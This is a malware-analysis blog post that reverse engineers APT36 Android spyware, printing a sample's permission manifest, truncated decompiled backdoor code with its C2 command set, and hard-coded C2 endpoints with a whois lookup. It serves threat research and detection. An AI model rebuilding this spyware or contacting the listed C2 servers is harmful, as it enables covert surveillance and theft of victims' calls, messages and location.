0x01c: Reverse Engineering APT36 Android Malware Targeting Military & Diplomatic Resources
[ INTRODUCTION ]
APT36, also referred to as Operation C-Major, PROJECTM, Mythic Leopard, and Transparent Tribe, is a Pakistani government-aligned actor that is a politically motivated Advanced Persistent Threat (APT) group. This APT group has been linked to Pakistan and mainly focuses its resources on targeting Indian Government entities and personnel. The motivation behind these attacks is information theft and espionage to gather intelligence from the Indian government, military, and diplomatic resources.
An example of this was unveiled by an investigation in previous years, of which, identified the APT group targeting Windows systems across Indian embassies in Saudi Arabia and Kazakhstan, as well as executing campaigns targeting officials of India’s Central Bureau of Investigation (CBI). More prominent, CNN-IBN discovered that Pakistani officials, allegedly Pakistan's ISI (Inter-Services Intelligence) agency was collecting data about Indian troop movements using Android malware disguised as an application called SmeshApp. At the time (2016), an attack by a heavily armed group against the Pathankhot Air Force base (part of the Western Air Command of the Indian Air Force) resulted in at least 6 deaths, and was carried out with a marked degree of foresight and knowledge of the air base and operations. A portion of intelligence gathered for that attack originated from SmeshApp's success and the attack was later claimed by the United Jihad Council, also known as the Muttahida Jihad Council, an Islamist Jihadist organisation (consisting of 13+ terrorist groups including the Jamaat-ul-Mujahideen) formed by the Pakistan Army for unified command and control over the anti-Indian militant groups operating in the Jammu and Kashmir province (which has been the subject of a dispute between India, Pakistan and China since the mid-20th century). While an outdated example, such campaigns from APT36 continue and are prominent today. This publication is a result of having identified over seventy (70) variants of Android malware with APT36 origins and modus operandi (MO), of which, has actively been used by the group for campaigns across the Android mobile ecosystem, until now. While these malware variants have been identified, new variants with alternative signatures, signals & IoCs that are not yet known continue to be developed by APT36. Another recent notable campaign by this APT group was leveraging deceit through disguising a RAT via a fraudulent national COVID-19 contact tracing application. Further reading can be located here.
Typically, the APT group’s arrival and payload delivery methods for Android malware include the use of social engineering through spear-phishing campaigns, alongside other deployment vectors that would execute a remote access trojan (RAT) upon conditional victim interaction.
The two malware strains that will be focused on below are backdoors developed by APT36 identified within the wild. These backdoors launched by APT36 permit the ability for the group to execute remote commands from their C2 (command and control) server, allowing; dynamic interception of target phone calls and SMS messages, tracking victim/target GPS location co-ordinates, as well as read, extract and exfiltrate personal identifiable information (PII) from the device, amongst other capabilities.
[ SIGNALS & INDICATORS OF COMPROMISE (IOCs) ]
After reverse engineering the malware cluster, many active samples related to common signals and IoCs (Indicators of Compromise). These signals and IoCs include, but are not limited to; programmtic style, programmtic code flow, remote C2 identification and interaction (and other secrets I won't share here).
Out of the cluster analysed, it was discovered that samples were non-sophisticated, no packing, cloaking, obfuscation, cryptographic routines or sophisticated detection and avoidance TTPs were in place. Further, malware samples did not contain native ELF binaries, meaning analysis of ARM ASM bins was not necessary across this cluster. A common practice by malware families is to use a brute-force automated approach in generation and dissemination of malware as opposed to stealth trade-craft seen amongst other apex threat actors.
[ ANALYSIS OF SAMPLE X ]
The following analysis is based on an APK malware sample originating from APT36. This sample has been defined here as sample X, and will be referred to as sample X from this point onwards. During the initial analysis it was identified that this sample had excessive android.permission.* constants defined within the application's manifest. This permitted the application to leverage access to the relevant Android device functions associated with such constants. In addition to the aforementioned, the manifest details the sample's entry point alongside registered broadcast receivers. These definitions have been outlined within the sample's manifest below:
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0" package="com.example.redacted.redacted" platformBuildVersionCode="23" platformBuildVersionName="6.0-2438415">
<uses-sdk android:minSdkVersion="13" android:targetSdkVersion="21"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_MULTICAST_STATE"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.VIBRATE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.CLEAR_APP_CACHE"/>
<uses-permission android:name="android.permission.READ_INSTALL_SESSIONS"/>
<application android:theme="@style/AppTheme" android:label="@string/app_name" android:icon="@drawable/ic_launcher" android:debuggable="true" android:allowBackup="false">
<activity android:label="@string/app_name" android:name="com.example.redcated.redacted.MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
</activity>
<service android:name="com.example.redacted.redacted.CMDService">
<action android:name=".CMDService"/>
</service>
<receiver android:name="com.example.redacted.redacted.BootUpReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED"/>
<category android:name="android.intent.category.DEFAULT"/>
</intent-filter>
</receiver>
<receiver android:name="com.example.redacted.redacted.SMSMonitor" android:exported="true">
<intent-filter android:priority="999">
<action android:name="android.provider.Telephony.SMS_RECEIVED"/>
</intent-filter>
</receiver>
<receiver android:name="com.example.redacted.redacted.CallMonitor">
<intent-filter>
<action android:name="android.intent.action.PHONE_STATE"/>
</intent-filter>
</receiver>
</application>
</manifest>
The above defines the following Android device permission constants (android.permission.*):
.ACCESS_NETWORK_STATE // ACCESS NETWORK INFORMATION, Wi-Fi, GSM, GPRS, UMTS ETC
.WRITE_EXTERNAL_STORAGE // WRITE TO DEVICE EXTERNAL STORAGE
.ACCESS_WIFI_STATE // ACCESS WIFI NETWORK INFORMATION
.ACCESS_COARSE_LOCATION // ACCESS APPROXIMATE LOCATION
.RECEIVE_BOOT_COMPLETED // RECEIVE THE ACTION_BOOT_COMPLETED INTENT
.CHANGE_WIFI_MULTICAST_STATE // WIFI MULTICAST MODE
.INTERNET // NETWORK OPERATIONS
.ACCESS_FINE_LOCATION. // ACCESS PRECISE LOCATION, GETLAT/GETLONG X,Y CO-ORDINATES
.RECEIVE_SMS // RECEIVE INBOUND SMS MESSAGES
.READ_SMS // READ DEVICE SMS STORE
.SEND_SMS // INTERACT W/ SMS MANAGER API TO SEMD TEXT & PDU SMS MESSAGES
.READ_PHONE_STATE // READ ACCESS TO CELLULAR NETWORK INFO, STATUS OF CALLS ETC
.PROCESS_OUTGOING_CALLS // IDENTIFY NUMBER DURING OUTBOUND CALL, REDIRECT OR ABORT CALL
.RECORD_AUDIO // ACCESS DEVICE MICROPHONE TO RECORD AUDIO
.CAMERA // ACCESS TO THE DEVICE CAMERA
.CALL_PHONE // INITIATE PHONE CALL WITHOUT UI DIALER OR CONF FROM OWNER
.READ_CONTACTS // INTERACT W/ CONTACTSCONTRACT API TO READ DEVICE CONTACTS
.VIBRATE // ACCESS TO THE DEVICE DC MOTOR THAT CREATES VIBRATION
.READ_CALL_LOG // READ DEVICE CALL LOG
.CLEAR_APP_CACHE // CLEAR CACHE OF ALL INSTALLED APKs
The sample's entry point is defined within the manifest via the android.intent.action.MAIN Intent:
android.intent.action.MAIN -> com.example.redcated.redacted.MainActivity
The sample's manifest defines the registered device broadcast receivers to be used for malicious intent:
android.intent.action.BOOT_COMPLETED // ON BOOT COMPLETE EVENT USED FOR MALWARE PERSISTENCE
android.provider.Telephony.SMS_RECEIVED // RECEIVER FOR DEVICE SMS MONITORING
android.intent.action.PHONE_STATE. // RECEIVER FOR DEVICE PHONE CALL MONITORING
After decompiling the sample's DEX (Dalvik bytecode), SMALi/baksmali to readable JAVA/Kotlin classes; the entry point, being, the MainActivity class defined by android.intent.action.MAIN is seen to contain an onCreate() method invoking another class, being CMDService class, of which, is also invoked via the onResume() and onStart() method within the same MainActivity class. The following represents the onCreate() method which is immediatley called by Android's javac/kotlinc compiler and executed on the JVM:
protected void onCreate(android.os.Bundle p9) {
super.onCreate(p9);
Maybe([ARRAY, OBJECT]) v7_0 = new android.content.Intent(v3_1);
Maybe([ARRAY, OBJECT]) v3_2 = v7_0;
v7_0.(this.getBaseContext(), com.example.redacted.redacted.CMDService.class);
this.startService(v3_2);
return;
}
Following the callback to the CMDService class defined within the above onCreate() method, we can see the sample defines Command and Control (C2) capabilities as well as instantiates programmatic IF/ELSE, CASE/SWITCH conditional statement for C2 flow. These C2 clauses execute depending on the input received by the remote C2 server that is in the control of APT36. Note; the below class has been truncated for brevity, while still highlighting a portion of the sample's backdoor capabilities:
public constructor com.example.redacted.redacted.CMDService() {
Maybe([ARRAY, OBJECT]) v5_0 = new com.example.redacted.redacted.fileUpload(v2_0);
Maybe([ARRAY, OBJECT]) v2_1 = v5_0;
v5_0.();
this.upload = v2_1;
Maybe([ARRAY, OBJECT]) v5_1 = new com.example.redacted.redacted.update(v2_2);
Maybe([ARRAY, OBJECT]) v2_3 = v5_1;
v5_1.();
this.newUp = v2_3;
Maybe([ARRAY, OBJECT]) v5_2 = new com.example.redacted.redacted.CMDService$2(v2_4);
Maybe([ARRAY, OBJECT]) v2_5 = v5_2;
v5_2.(this);
this.toastHandler = v2_5;
return;
}
private void callRecording() {
try {
if (this.callRec == null) {
this.t_manager = ((android.telephony.TelephonyManager)this.getSystemService("phone"));
Maybe([ARRAY, OBJECT]) v6_0 = new com.example.redacted.redacted.CMDService$1(v3_3);
[...]
} else {
this.callRec.stop();
}
} catch (Exception v2_2) {
}
return;
}
private boolean isConnected() {
Type(UNKNOWN) v3_8;
Maybe([ARRAY, OBJECT]) v2_0 = ((android.net.ConnectivityManager)this.getSystemService("connectivity")).getActiveNetworkInfo();
if ((v2_0 == null) || (!v2_0.isConnected())) {
v3_8 = 0;
} else {
v3_8 = 1;
}
return v3_8;
}
private void micRecording() {
try {
com.example.redacted.redacted.setting.setRecType(1);
} catch (Exception v2_3) {
return;
}
if (this.audio != null) {
this.audio.stop();
}
Maybe([ARRAY, OBJECT]) v5_0 = new com.example.redacted.redacted.AudioStreamer(v3_0);
[...]
if (!com.example.redacted.redacted.setting.isNetworkEnabled) {
[...]
String v4_26;
v1_0.put("posnetwork", v4_24);
if (!com.example.redacted.redacted.setting.isGPSEnabled) {
[...]
String v4_28;
v1_0.put("posgps", v4_26);
if (!com.example.redacted.redacted.setting.recMic) {
[...]
String v4_30;
v1_0.put("recMic", v4_28);
if (!com.example.redacted.redacted.setting.recCall) {
[...]
v1_0.put("recCall", v4_30);
v1_0.put("smsMoniterUp", com.example.redacted.redacted.setting.smsMoniterUp);
v1_0.put("smsMoniterDw", com.example.redacted.redacted.setting.smsMoniterDw);
v1_0.put("smsWhere", com.example.redacted.redacted.setting.smsWhere);
v1_0.put("callMoniterUp", com.example.redacted.redacted.setting.callMoniterUp);
v1_0.put("callMoniterDw", com.example.redacted.redacted.setting.callMoniterDw);
v1_0.put("callWhere", com.example.redacted.redacted.setting.callWhere);
v1_0.put("capPath", com.example.redacted.redacted.setting.capPath);
v1_0.put("recPath", com.example.redacted.redacted.setting.recPath);
v1_0.put("simSerial", this.info.getSimSerial());
[...]
v1_0.put("network", this.info.networkInfo());
v1_0.put("simOperatorCode", this.info.getSimOperatorCode());
v1_0.put("CID", "0");
v0_1 = v1_0;
return v0_1;
}
private void startService() {
try {
if (!com.example.redacted.redacted.setting.recMic) {
if (com.example.redacted.redacted.setting.recCall) {
this.callRecording();
}
} else {
this.micRecording();
}
} catch (Exception v2_1) {
}
[...]
private void stopMic() {
[...]
private void stopRecording() {
[...]
public void gaveCall(org.json.JSONObject p11, String p12) {
[...]
return;
}
public android.os.IBinder onBind(android.content.Intent p4) {
return 0;
}
public void onCreate() {
[...]
public void onDestroy() {
[...]
public int onStartCommand(android.content.Intent p10, int p11, int p12) {
Maybe([ARRAY, OBJECT]) v8_0 = new com.example.redacted.redacted.SystemInfo(v5_0);
Maybe([ARRAY, OBJECT]) v5_1 = v8_0;
v8_0.(this.ctx);
this.info = v5_1;
com.example.redacted.redacted.setting.os = this.info.androidInfo();
com.example.redacted.redacted.setting.ip = this.info.getIP();
com.example.redacted.redacted.setting.imi = this.info.getIMEI();
if (com.example.redacted.redacted.setting.errors) {
android.widget.Toast.makeText(this, "Service Started", 1).show();
}
return 1;
}
public void parseJson(String p11) {
[...]
public void processCMD(String p28, String p29, org.json.JSONObject p30) {
[...]
Maybe([ARRAY, OBJECT]) v26_1 = new org.json.JSONObject(v22_13);
Maybe([ARRAY, OBJECT]) v22_14 = v26_1;
v26_1.();
this.json = v22_14;
Type(UNKNOWN) v10_0 = -1;
switch (p28.hashCode()) {
case -2081149304: {
if (!p28.equals("smslogs")) {
} else {
v10_0 = 14;
}
}
case -2080935717: {
if (!p28.equals("smsstop")) {
} else {
v10_0 = 8;
}
break;
}
case -1949226856: {
if (!p28.equals("updateApp")) {
} else {
v10_0 = 18;
}
break;
}
case -1884090038: {
if (!p28.equals("showtoast")) {
} else {
v10_0 = 27;
}
break;
}
case -1586980162: {
if (!p28.equals("capscreen")) {
} else {
v10_0 = 12;
}
break;
}
case -1511056665: {
if (!p28.equals("gavecall")) {
} else {
v10_0 = 28;
}
break;
}
case -1494966503: {
if (!p28.equals("callmoniterdw")) {
} else {
v10_0 = 7;
}
break;
}
case -1494965983: {
if (!p28.equals("callmoniterup")) {
} else {
v10_0 = 6;
}
break;
}
case -1242790650: {
if (!p28.equals("frontcam")) {
} else {
v10_0 = 22;
}
break;
}
case -1097488054: {
if (!p28.equals("locGPS")) {
} else {
v10_0 = 32;
}
break;
}
case -841778170: {
if (!p28.equals("callmoniter")) {
} else {
v10_0 = 5;
}
break;
}
case -838846263: {
if (!p28.equals("update")) {
} else {
v10_0 = 17;
}
break;
}
case -838595071: {
if (!p28.equals("upload")) {
} else {
v10_0 = 20;
}
break;
}
case -838527722: {
if (!p28.equals("locnetwok")) {
} else {
v10_0 = 31;
}
break;
}
case -772212565: {
if (!p28.equals("smsmoniter")) {
} else {
v10_0 = 9;
}
break;
}
case -756665192: {
if (!p28.equals("dirlister")) {
} else {
v10_0 = 25;
}
break;
}
case -682097870: {
if (!p28.equals("locstatus")) {
} else {
v10_0 = 30;
}
break;
}
case -632298035: {
if (!p28.equals("conlister")) {
} else {
v10_0 = 24;
}
break;
}
case -347210360: {
if (!p28.equals("backcam")) {
} else {
v10_0 = 21;
}
break;
}
case -309518737: {
if (!p28.equals("process")) {
} else {
v10_0 = 33;
}
break;
}
case -171908851: {
if (!p28.equals("calllogs")) {
} else {
v10_0 = 23;
}
break;
}
case -171695264: {
if (!p28.equals("callstop")) {
} else {
v10_0 = 4;
}
break;
}
case 3237038: {
if (!p28.equals("info")) {
} else {
v10_0 = 16;
}
break;
}
case 3441010: {
if (!p28.equals("ping")) {
} else {
v10_0 = 15;
}
break;
}
case 451310959: {
if (!p28.equals("vibrate")) {
} else {
v10_0 = 26;
}
break;
}
case 735830995: {
if (!p28.equals("recordstop")) {
} else {
v10_0 = 3;
}
break;
}
case 933070462: {
if (!p28.equals("smsmoniterdw")) {
} else {
v10_0 = 11;
}
break;
}
case 933070982: {
if (!p28.equals("smsmoniterup")) {
} else {
v10_0 = 10;
}
break;
}
case 993551837: {
if (!p28.equals("recordcal")) {
} else {
v10_0 = 0;
}
break;
}
case 993561686: {
if (!p28.equals("recordmic")) {
} else {
v10_0 = 2;
}
break;
}
case 1427818632: {
if (!p28.equals("download")) {
} else {
v10_0 = 13;
}
break;
}
case 1764172231: {
if (!p28.equals("deleteFile")) {
} else {
v10_0 = 19;
}
break;
}
case 1894189872: {
if (!p28.equals("stopcallrec")) {
} else {
v10_0 = 1;
}
break;
}
case 1979932881: {
if (!p28.equals("sendsms")) {
} else {
v10_0 = 29;
}
break;
}
}
public void sendLocNetwork(String p13, String p14) {
try {
String v8_3;
Maybe([ARRAY, OBJECT]) v11_0 = new com.example.redacted.redacted.GPSListener(v6_0);
[...]
}
In addition to the above, the sample contains a CallMonitor class and a SMSMonitor class, these classes are associated with registered broadcast receivers permitting real-time monitoring of inbound phone calls and SMS messages. Both of these receivers define a HTTP asynchronous task containing callbacks to another class titled setting. This setting class defines the adversary's remote C2 within the webUrl parameter and is leveraged for C2 input alongside data exfiltration mechanics from data extracted from the device. The nested CallMonitor$HttpAsyncTask class illustrates this below:
public class com.example.redacted.redacted.CallMonitor$HttpAsyncTask extends android.os.AsyncTask {
final synthetic com.example.redacted.redacted.CallMonitor this$0;
public constructor com.example.redacted.redacted.CallMonitor$HttpAsyncTask(com.example.redacted.redacted.CallMonitor p5) {
this.this$0 = p5;
return;
}
protected synthetic bridge Object doInBackground(Object[] p5) {
return this.doInBackground(((org.json.JSONObject[])p5));
}
protected varargs String doInBackground(org.json.JSONObject[] p8) {
Maybe([ARRAY, OBJECT]) v6_0 = new com.example.redacted.redacted.httpCall(v3_0);
Maybe([ARRAY, OBJECT]) v3_1 = v6_0;
v6_0.();
return v3_1.POST(p8[0]);
}
}
The above contains a callback to httpCall, of which, references v14_2., a callback to the setting class where webUrl, a parameter assigned with a hard-coded value, is defined. This value is the malware sample's remote C2 server, of which, is used to transmit dynamic commands from APT36 to the compromised device (command execution), as well as, exfiltrate device data over an outbound HTTP socket:
static {
com.example.redacted.redacted.setting.webUrl = "http[:]//android[.]viral91[.]xyz/admin/webservices";
[ ANALYSIS OF SAMPLE Y ]
Sample Y and the other 68 samples were similar to sample X in structure, consisting of the same programmatic style, language, and callback routines. The above sample was typical amongst the cluster, however, majority had appointed a TCP client for the author's remote C2 server as opposed to the asynchronous (full-duplex) socket:
static {
com.example.appcode.appcode.setting.SERVERIP = "5.189.177.175";
com.example.appcode.appcode.setting.SERVERPORT = 12280;
The malware author's C2 is associated with a German host provider, Contabo GmbH (AS51167. A common connection amongst various APT36 campaigns. All malware used in Operation Sidecopy (active from 2019) have been directed through Contabo GmbH. This appears to be a signature practice in the case of APT36. Recently it has been observed that this threat actor is misleading the security community by copying tactics, techniques and procedures (TTPs) that point at another group, Sidewinder (T-APT-04). Sidewinder is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan (just to put in context the political cyber warfare that continues to occur):
ret2eax@h0m3cr3w~$: whois 5.189.177.175
inetnum: 5.0.0.0 - 5.255.255.255
organisation: RIPE NCC
status: ALLOCATED
netname: CONTABO
descr: Contabo GmbH
country: DE
org: ORG-GG22-RIPE
admin-c: MH7476-RIPE
tech-c: MH7476-RIPE
status: ASSIGNED PA
mnt-by: MNT-CONTABO
mnt-lower: MNT-CONTABO
mnt-domains: MNT-CONTABO
mnt-routes: MNT-CONTABO
created: 2014-04-27T12:56:48Z
last-modified: 2014-04-27T12:56:48Z
source: RIPE
organisation: ORG-GG22-RIPE
org-name: Contabo GmbH
country: DE
org-type: LIR
address: Aschauer Strasse 32a
address: 81549
address: Munchen
address: GERMANY
phone: +498921268372
fax-no: +498921665862
abuse-c: MH12453-RIPE
mnt-ref: RIPE-NCC-HM-MNT
mnt-ref: MNT-CONTABO
mnt-ref: MNT-OCIRIS
mnt-by: RIPE-NCC-HM-MNT
mnt-by: MNT-CONTABO
created: 2009-12-09T13:41:08Z
last-modified: 2021-09-14T10:49:04Z
source: RIPE # Filtered
person: Wilhelm Zwalina
address: Contabo GmbH
address: Aschauer Str. 32a
address: 81549 Muenchen
phone: +49 89 21268372
fax-no: +49 89 21665862
nic-hdl: MH7476-RIPE
mnt-by: MNT-CONTABO
mnt-by: MNT-GIGA-HOSTING
created: 2010-01-04T10:41:37Z
last-modified: 2020-04-24T16:09:30Z
source: RIPE
% Information related to '5.189.176.0/20AS51167'
route: 5.189.176.0/20
descr: CONTABO
origin: AS51167
mnt-by: MNT-CONTABO
created: 2014-04-27T12:57:54Z
last-modified: 2014-04-27T12:57:54Z
source: RIPE